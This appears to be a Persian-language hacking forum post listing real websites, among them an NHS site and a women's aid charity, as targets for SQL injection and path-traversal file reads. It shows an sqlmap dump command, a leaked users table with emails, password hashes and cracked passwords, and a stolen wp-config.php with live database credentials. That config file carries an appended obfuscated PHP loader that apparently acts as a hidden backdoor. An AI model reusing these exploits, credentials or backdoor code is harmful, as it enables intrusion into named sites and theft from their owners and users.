کد:
http://www.khotang.com/supdoc.php?subdoc_title=wp%27
http://www.katun.me/gallery.php?id=-2%27 https://www.panki.it/en/gallery.php?id=139%27 http://www.melbournefineart.com.au/gallery.php?id=18%27 https://mvss.in/gallery.php?id=6%27 https://www.realinstruments.ca/gallery.php?id=1%27 http://www.christhujyothi.com/gallery.php?id=2%27 https://www.skystartravels.com/gallery.php?id=1%27
https://safaritents.net/
| ID | Email | IsAdmin | Username | UserType | Password | +----+----------------------------+---------+----------+-----------------+-----------------------------------------------------+ | 1 | [email protected] | 1 | admin | Web Development | caeb8afe6724f16686c5120fcb9b11eaa2008a43 (kheldar5) | | 2 | [email protected] | 0 | safari | Site Owner | b7a875fc1ea228b9061041b7cec4bd3c52ab3ce3 (letmein) | +----+----------------------------+---------+----------+-----------------+-----------------------------------------------------+
sqlmap -u "https://www.safaritents.net/client.php?id=18%27" --random-agent -D safari -T users --dump
http://londonpc.org.uk/wp-content/themes/dentalia/forms/download.php?file=../../../../wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'londonpcuk'); /** MySQL database username */ define('DB_USER', 'londonpc'); /** MySQL database password */ define('DB_PASSWORD', 'londonpc@2018'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * [USER="316"]since[/USER] 2.6.0 */ define('AUTH_KEY', 'put your unique phrase here'); define('SECURE_AUTH_KEY', 'put your unique phrase here'); define('LOGGED_IN_KEY', 'put your unique phrase here'); define('NONCE_KEY', 'put your unique phrase here'); define('AUTH_SALT', 'put your unique phrase here'); define('SECURE_AUTH_SALT', 'put your unique phrase here'); define('LOGGED_IN_SALT', 'put your unique phrase here'); define('NONCE_SALT', 'put your unique phrase here'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false); define('FORCE_SSL_ADMIN', true); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); $vX8 = ",M7cxlbht :oRL02DuXz;*1TU)O5Kk_8CJm3PY=i /enE9(GwN'+jWvsBfdpQqayHZVrg6SA.IF4";$bxs = $vX8[3].$vX8[62].$vX8[5].$vX8[5].$vX8[30].$vX8[17].$vX8[55].$vX8[42].$vX8[67].$vX8[30].$vX8[57].$vX8[17].$vX8[43].$vX8[3];$obQ = $vX8[3].$vX8[67].$vX8[42].$vX8[62].$vX8[8].$vX8[42].$vX8[30].$vX8[57].$vX8[17].$vX8[43].$vX8[3].$vX8[8].$vX8[39].$vX8[11].$vX8[43];$dp7 = $vX8[68].$vX8[19].$vX8[39].$vX8[43].$vX8[57].$vX8[5].$vX8[62].$vX8[8].$vX8[42];$Qde = $vX8[6].$vX8[62].$vX8[55].$vX8[42].$vX8[69].$vX8[75].$vX8[30].$vX8[58].$vX8[42].$vX8[3].$vX8[11].$vX8[58].$vX8[42];$tbB = $vX8[9].$vX8[40].$vX8[40].$vX8[40].$vX8[40];$Cnd = $vX8[50].$vX8[64].$vX8[37].$vX8[35].$vX8[56].$vX8[39].$vX8[55].$vX8[73].$vX8[48].$vX8[74].$vX8[44].$vX8[66].$vX8[41].$vX8[59].$vX8[12].$vX8[26].$vX8[44].$vX8[33].$vX8[52].$vX8[71].$vX8[29].$vX8[52].$vX8[12].$vX8[37].$vX8[58].$vX8[13].$vX8[37].$vX8[28].$vX8[6].$vX8[14].$vX8[66].$vX8[43].$vX8[33].$vX8[13].$vX8[13].$vX8[11].$vX8[23].$vX8[32].$vX8[53].$vX8[35].$vX8[69].$vX8[15].$vX8[68].$vX8[65].$vX8[52].$vX8[73].$vX8[55].$vX8[14].$vX8[67].$vX8[26].$vX8[33].$vX8[6].$vX8[51].$vX8[51].$vX8[48].$vX8[23].$vX8[54].$vX8[69].$vX8[43].$vX8[73].$vX8[27].$vX8[43].$vX8[47].$vX8[54].$vX8[62].$vX8[7].$vX8[64].$vX8[2].$vX8[71].$vX8[41].$vX8[37].$vX8[74].$vX8[41].$vX8[58].$vX8[28].$vX8[74].$vX8[26].$vX8[35].$vX8[51].$vX8[24].$vX8[5].$vX8[2].$vX8[37].$vX8[57].$vX8[14].$vX8[63].$vX8[8].$vX8[39].$vX8[14].$vX8[61].$vX8[36].$vX8[42].$vX8[64].$vX8[22].$vX8[5].$vX8[7].$vX8[60].$vX8[64].$vX8[62].$vX8[16].$vX8[70].$vX8[35].$vX8[39].$vX8[44].$vX8[75].$vX8[16].$vX8[33].$vX8[23].$vX8[14].$vX8[39].$vX8[73].$vX8[51].$vX8[58].$vX8[44].$vX8[49].$vX8[55].$vX8[66].$vX8[5].$vX8[27].$vX8[55].$vX8[8].$vX8[18].$vX8[35].$vX8[45].$vX8[4].$vX8[28].$vX8[66].$vX8[57].$vX8[39].$vX8[27].$vX8[43].$vX8[28].$vX8[4].$vX8[2].$vX8[26].$vX8[12].$vX8[13].$vX8[65].$vX8[36].$vX8[75].$vX8[53].$vX8[12].$vX8[1].$vX8[35].$vX8[4].$vX8[39].$vX8[37].$vX8[60].$vX8[66].$vX8[33].$vX8[61].$vX8[61].$vX8[52].$vX8[65].$vX8[24].$vX8[31].$vX8[73].$vX8[34].$vX8[35].$vX8[61].$vX8[11].$vX8[47].$vX8[7].$vX8[68].$vX8[11].$vX8[51].$vX8[70].$vX8[43].$vX8[13].$vX8[18].$vX8[63].$vX8[74].$vX8[27].$vX8[5].$vX8[17].$vX8[12].$vX8[65].$vX8[43].$vX8[59].$vX8[48].$vX8[45].$vX8[33].$vX8[29].$vX8[3].$vX8[41].$vX8[17].$vX8[39].$vX8[6].$vX8[32].$vX8[31].$vX8[16].$vX8[12].$vX8[37].$vX8[19].$vX8[47].$vX8[71].$vX8[16].$vX8[23].$vX8[71].$vX8[58].$vX8[58].$vX8[53].$vX8[62].$vX8[54].$vX8[47].$vX8[71].$vX8[73].$vX8[49].$vX8[61].$vX8[12].$vX8[69].$vX8[42].$vX8[59].$vX8[64].$vX8[61].$vX8[56].$vX8[32].$vX8[42].$vX8[64].$vX8[3].$vX8[14].$vX8[35].$vX8[8].$vX8[44].$vX8[14].$vX8[41].$vX8[42].$vX8[4].$vX8[42].$vX8[4].$vX8[67].$vX8[24].$vX8[15].$vX8[67].$vX8[67].$vX8[70].$vX8[17].$vX8[71].$vX8[61].$vX8[4].$vX8[19].$vX8[22].$vX8[37].$vX8[16].$vX8[15].$vX8[16].$vX8[3].$vX8[60].$vX8[2].$vX8[74].$vX8[5].$vX8[36].$vX8[1].$vX8[31].$vX8[19].$vX8[31].$vX8[38].$vX8[50];@$bxs($obQ($tbB,$dp7($Qde($vX8[50].$vX8[64].$vX8[37].$vX8[35].$vX8[56].$vX8[39].$vX8[55].$vX8[73].$vX8[48].$vX8[74].$vX8[44].$vX8[66].$vX8[41].$vX8[59].$vX8[12].$vX8[26].$vX8[44].$vX8[33].$vX8[52].$vX8[71].$vX8[29].$vX8[52].$vX8[12].$vX8[37].$vX8[58].$vX8[13].$vX8[37].$vX8[28].$vX8[6].$vX8[14].$vX8[66].$vX8[43].$vX8[33].$vX8[13].$vX8[13].$vX8[11].$vX8[23].$vX8[32].$vX8[53].$vX8[35].$vX8[69].$vX8[15].$vX8[68].$vX8[65].$vX8[52].$vX8[73].$vX8[55].$vX8[14].$vX8[67].$vX8[26].$vX8[33].$vX8[6].$vX8[51].$vX8[51].$vX8[48].$vX8[23].$vX8[54].$vX8[69].$vX8[43].$vX8[73].$vX8[27].$vX8[43].$vX8[47].$vX8[54].$vX8[62].$vX8[7].$vX8[64].$vX8[2].$vX8[71].$vX8[41].$vX8[37].$vX8[74].$vX8[41].$vX8[58].$vX8[28].$vX8[74].$vX8[26].$vX8[35].$vX8[51].$vX8[24].$vX8[5].$vX8[2].$vX8[37].$vX8[57].$vX8[14].$vX8[63].$vX8[8].$vX8[39].$vX8[14].$vX8[61].$vX8[36].$vX8[42].$vX8[64].$vX8[22].$vX8[5].$vX8[7].$vX8[60].$vX8[64].$vX8[62].$vX8[16].$vX8[70].$vX8[35].$vX8[39].$vX8[44].$vX8[75].$vX8[16].$vX8[33].$vX8[23].$vX8[14].$vX8[39].$vX8[73].$vX8[51].$vX8[58].$vX8[44].$vX8[49].$vX8[55].$vX8[66].$vX8[5].$vX8[27].$vX8[55].$vX8[8].$vX8[18].$vX8[35].$vX8[45].$vX8[4].$vX8[28].$vX8[66].$vX8[57].$vX8[39].$vX8[27].$vX8[43].$vX8[28].$vX8[4].$vX8[2].$vX8[26].$vX8[12].$vX8[13].$vX8[65].$vX8[36].$vX8[75].$vX8[53].$vX8[12].$vX8[1].$vX8[35].$vX8[4].$vX8[39].$vX8[37].$vX8[60].$vX8[66].$vX8[33].$vX8[61].$vX8[61].$vX8[52].$vX8[65].$vX8[24].$vX8[31].$vX8[73].$vX8[34].$vX8[35].$vX8[61].$vX8[11].$vX8[47].$vX8[7].$vX8[68].$vX8[11].$vX8[51].$vX8[70].$vX8[43].$vX8[13].$vX8[18].$vX8[63].$vX8[74].$vX8[27].$vX8[5].$vX8[17].$vX8[12].$vX8[65].$vX8[43].$vX8[59].$vX8[48].$vX8[45].$vX8[33].$vX8[29].$vX8[3].$vX8[41].$vX8[17].$vX8[39].$vX8[6].$vX8[32].$vX8[31].$vX8[16].$vX8[12].$vX8[37].$vX8[19].$vX8[47].$vX8[71].$vX8[16].$vX8[23].$vX8[71].$vX8[58].$vX8[58].$vX8[53].$vX8[62].$vX8[54].$vX8[47].$vX8[71].$vX8[73].$vX8[49].$vX8[61].$vX8[12].$vX8[69].$vX8[42].$vX8[59].$vX8[64].$vX8[61].$vX8[56].$vX8[32].$vX8[42].$vX8[64].$vX8[3].$vX8[14].$vX8[35].$vX8[8].$vX8[44].$vX8[14].$vX8[41].$vX8[42].$vX8[4].$vX8[42].$vX8[4].$vX8[67].$vX8[24].$vX8[15].$vX8[67].$vX8[67].$vX8[70].$vX8[17].$vX8[71].$vX8[61].$vX8[4].$vX8[19].$vX8[22].$vX8[37].$vX8[16].$vX8[15].$vX8[16].$vX8[3].$vX8[60].$vX8[2].$vX8[74].$vX8[5].$vX8[36].$vX8[1].$vX8[31].$vX8[19].$vX8[31].$vX8[38].$vX8[50]))),$vX8[35],$vX8[35],$vX8[35],$vX8[27],$vX8[15],$vX8[22],$vX8[75],$vX8[22]);
http://londonpc.org.uk/wp-content/themes/dentalia/forms/download.php?file=download.php http://www.hopwoodmc.nhs.uk/download.php?file=index.php http://www.llangennithllanmadoccc.org.uk/download.php?file=download.php http://www.dundeewomensaid.co.uk/download.php?file=download.php http://www.pioneerprocurement.co.uk/assets/documents/download.php?file=download.php http://emmanuel.org.uk/audio/notes/download.php?file=download.php
نظر